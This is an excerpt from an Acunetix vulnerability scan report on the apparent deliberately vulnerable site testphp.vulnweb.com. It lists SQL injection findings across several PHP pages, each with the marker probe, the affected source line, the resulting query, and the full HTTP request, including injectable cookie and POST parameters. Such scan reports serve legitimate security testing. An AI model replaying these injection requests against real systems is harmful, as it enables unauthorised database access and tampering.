URL encoded GET input id was set to 1ACUSTART'"12wlFACUENDAdditional details: Source file: /hj/var/www//Mod_Rewrite_Shop/buy.php line: 6 SQL query: SELECT * from products where id=1ACUSTART'"12wlFACUEND "mysql_query" was called. Stack trace: 1.ProcessID([string] "1ACUSTART'"12wlFACUEND")
GET /Mod_Rewrite_Shop/buy.php?id=1ACUSTART'"12wlFACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Mod_Rewrite_Shop/details.php
70Acunetix Website Audit
Details
URL encoded GET input id was set to 1ACUSTART'"cXCwxACUENDAdditional details: Source file: /hj/var/www//Mod_Rewrite_Shop/details.php line: 4 SQL query: SELECT * from products where id=1ACUSTART'"cXCwxACUEND "mysql_query" was called.
GET /Mod_Rewrite_Shop/details.php?id=1ACUSTART'"cXCwxACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Mod_Rewrite_Shop/rate.php
Details
URL encoded GET input id was set to 1ACUSTART'"g97N9ACUENDAdditional details: Source file: /hj/var/www//Mod_Rewrite_Shop/rate.php line: 6 SQL query: SELECT * from products where id=1ACUSTART'"g97N9ACUEND "mysql_query" was called. Stack trace: 1.ProcessID([string] "1ACUSTART'"g97N9ACUEND")
GET /Mod_Rewrite_Shop/rate.php?id=1ACUSTART'"g97N9ACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/product.php
Details
Cookie input login was set to 1ACUSTART'"ctNejACUENDAdditional details: Source file: /hj/var/www//product.php line: 51 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"ctNejACUEND' AND pass='' "mysql_query" wascalled.
GET /product.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Cookie: login=1ACUSTART'"ctNejACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Request headers
71Acunetix Website Audit
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/product.php
Details
URL encoded GET input pic was set to 1ACUSTART'"JPtCvACUENDAdditional details: Source file: /hj/var/www//product.php line: 68 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND a.pic_id=1ACUSTART'"JPtCvACUEND "mysql_query" was called.
GET /product.php?pic=1ACUSTART'"JPtCvACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/search.php
Details
Cookie input login was set to 1ACUSTART'"WxYBAACUENDAdditional details: Source file: /hj/var/www//search.php line: 44 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"WxYBAACUEND' AND pass='' "mysql_query" wascalled.
GET /search.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Cookie: login=1ACUSTART'"WxYBAACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/search.php
72Acunetix Website Audit
Details
URL encoded POST input searchFor was set to 1ACUSTART'"loYAnACUENDAdditional details: Source file: /hj/var/www//search.php line: 70 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND (LOCATE('1ACUSTART'"loYAnACUEND', a.title) > 0 ORLOCATE('1ACUSTART'"loYAnACUEND', a.pshort) > 0) "mysql_query" was called.
POST /search.php?test=1 HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
searchFor=1ACUSTART'"loYAnACUEND
Request headers
/search.php
Details
URL encoded POST input searchFor was set to 1ACUSTART'"utFXSACUENDAdditional details: Source file: /hj/var/www//search.php line: 70 SQL query: SELECT a.*, b.aname, b.artist_id, c.cname FROM pictures a, artists b, categ c WHERE a.cat_id=c.cat_idAND a.a_id=b.artist_id AND (LOCATE('1ACUSTART'"utFXSACUEND', a.title) > 0 ORLOCATE('1ACUSTART'"utFXSACUEND', a.pshort) > 0) "mysql_query" was called.
POST /search.php?test=query HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
goButton=go&searchFor=1ACUSTART'"utFXSACUEND
Request headers
/search.php
73Acunetix Website Audit
Details
URL encoded GET input test was set to 1ACUSTART'"TP76JACUENDAdditional details: Source file: /hj/var/www//search.php line: 60 SQL query: SELECT * FROM guestbook WHERE sender='1ACUSTART'"TP76JACUEND'; "mysql_query" was called.
POST /search.php?test=1ACUSTART'"TP76JACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
searchFor=1
Request headers
/search.php
Details
URL encoded GET input test was set to 1ACUSTART'"mb71xACUENDAdditional details: Source file: /hj/var/www//search.php line: 60 SQL query: SELECT * FROM guestbook WHERE sender='1ACUSTART'"mb71xACUEND'; "mysql_query" was called.
POST /search.php?test=1ACUSTART'"mb71xACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
goButton=go&searchFor=
Request headers
/secured/newuser.php
Details
URL encoded POST input uuname was set to 1ACUSTART'"ZyCc4ACUENDAdditional details: Source file: /hj/var/www//secured/newuser.php line: 16 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"ZyCc4ACUEND' "mysql_query" was called.
POST /secured/newuser.php HTTP/1.1
Request headers
74Acunetix Website Audit
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 205
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email
.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=rbyjoahd&
uuname=1ACUSTART'"ZyCc4ACUEND
/sendcommand.php
Details
URL encoded POST input cart_id was set to 1ACUSTART'"bAxWhACUENDAdditional details: Source file: /hj/var/www//sendcommand.php line: 17 SQL query: DELETE FROM carts WHERE cart_id='1ACUSTART'"bAxWhACUEND' "mysql_query" was called.
POST /sendcommand.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
submitForm=place%20a%20command%20for%20these%20items&cart_id=1ACUSTART'"bAxWhACUEND
Request headers
/sendcommand.php
Details
URL encoded POST input cart_id was set to 1ACUSTART'"yJrZSACUENDAdditional details: Source file: /hj/var/www//sendcommand.php line: 17 SQL query: DELETE FROM carts WHERE cart_id='1ACUSTART'"yJrZSACUEND' "mysql_query" was called.
POST /sendcommand.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
Request headers
75Acunetix Website Audit
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
cart_id=1ACUSTART'"yJrZSACUEND
/userinfo.php
Details
Cookie input login was set to 1ACUSTART'"C0V02ACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 46 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"C0V02ACUEND' AND pass='' "mysql_query" wascalled.
GET /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Cookie: login=1ACUSTART'"C0V02ACUEND; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/userinfo.php
Details
URL encoded POST input pass was set to 1ACUSTART'"yJk7ZACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 8 SQL query: SELECT * FROM users WHERE uname='test' AND pass='1ACUSTART'"yJk7ZACUEND' "mysql_query"was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
pass=1ACUSTART'"yJk7ZACUEND&uname=test
Request headers
/userinfo.php
76Acunetix Website Audit
Details
URL encoded POST input uaddress was set to 1ACUSTART'"Ov4arACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = '1ACUSTART'"Ov4arACUEND',email = '[email protected]', phone = 'test' WHERE uname = 'test' "mysql_query" was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=1ACUSTART'"Ov4arACUEND&ucc=1234-5678-2300-9000&[email protected]&uname=1&u
pdate=update&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uaddress was set to 1ACUSTART'"0glYGACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = '1ACUSTART'"0glYGACUEND',email = '[email protected]', phone = 'test' WHERE uname = 'test' "mysql_query" was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=1ACUSTART'"0glYGACUEND&ucc=1234-5678-2300-9000&uemail=ccccc%40gma
il.com&uphone=test&urname=test
Request headers
/userinfo.php
77Acunetix Website Audit
Details
URL encoded POST input ucc was set to 1ACUSTART'"6qlErACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1ACUSTART'"6qlErACUEND', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = 'test' WHERE uname = 'test' "mysql_query"was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1ACUSTART
'"6qlErACUEND&uemail=ccccc%40gmail.com&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input ucc was set to 1ACUSTART'"WAt5JACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1ACUSTART'"WAt5JACUEND', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = 'test' WHERE uname = 'test' "mysql_query"was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1ACUSTART'"WAt5JACUEND&[email protected]&uname=1&upda
te=update&uphone=test&urname=test
Request headers
/userinfo.php
78Acunetix Website Audit
Details
URL encoded POST input uemail was set to 1ACUSTART'"2u9BSACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '1ACUSTART'"2u9BSACUEND', phone = 'test' WHERE uname = 'test'"mysql_query" was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 152
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678
-2300-9000&uemail=1ACUSTART'"2u9BSACUEND&uphone=test&urname=test
Request headers
/userinfo.php
Details
URL encoded POST input uemail was set to 1ACUSTART'"JL6otACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '1ACUSTART'"JL6otACUEND', phone = 'test' WHERE uname = 'test'"mysql_query" was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
uaddress=SELECT *
FROM
INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&uemail=1ACUSTART'"JL6otACUEND&uname=1&
update=update&uphone=test&urname=test
Request headers
/userinfo.php
79Acunetix Website Audit
Details
URL encoded POST input uname was set to 1ACUSTART'"tYz3WACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 8 SQL query: SELECT * FROM users WHERE uname='1ACUSTART'"tYz3WACUEND' AND pass='test' "mysql_query"was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
pass=test&uname=1ACUSTART'"tYz3WACUEND
Request headers
/userinfo.php
Details
URL encoded POST input uphone was set to 1ACUSTART'"iR0eRACUENDAdditional details: Source file: /hj/var/www//userinfo.php line: 32 SQL query: UPDATE users SET name = 'test', cc = '1234-5678-2300-9000', address = 'SELECT * FROMINFORMATION_SCHEMA.TABLES', email = '[email protected]', phone = '1ACUSTART'"iR0eRACUEND' WHEREuname = 'test' "mysql_query" was called.
POST /userinfo.php HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Content-Length: 165
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
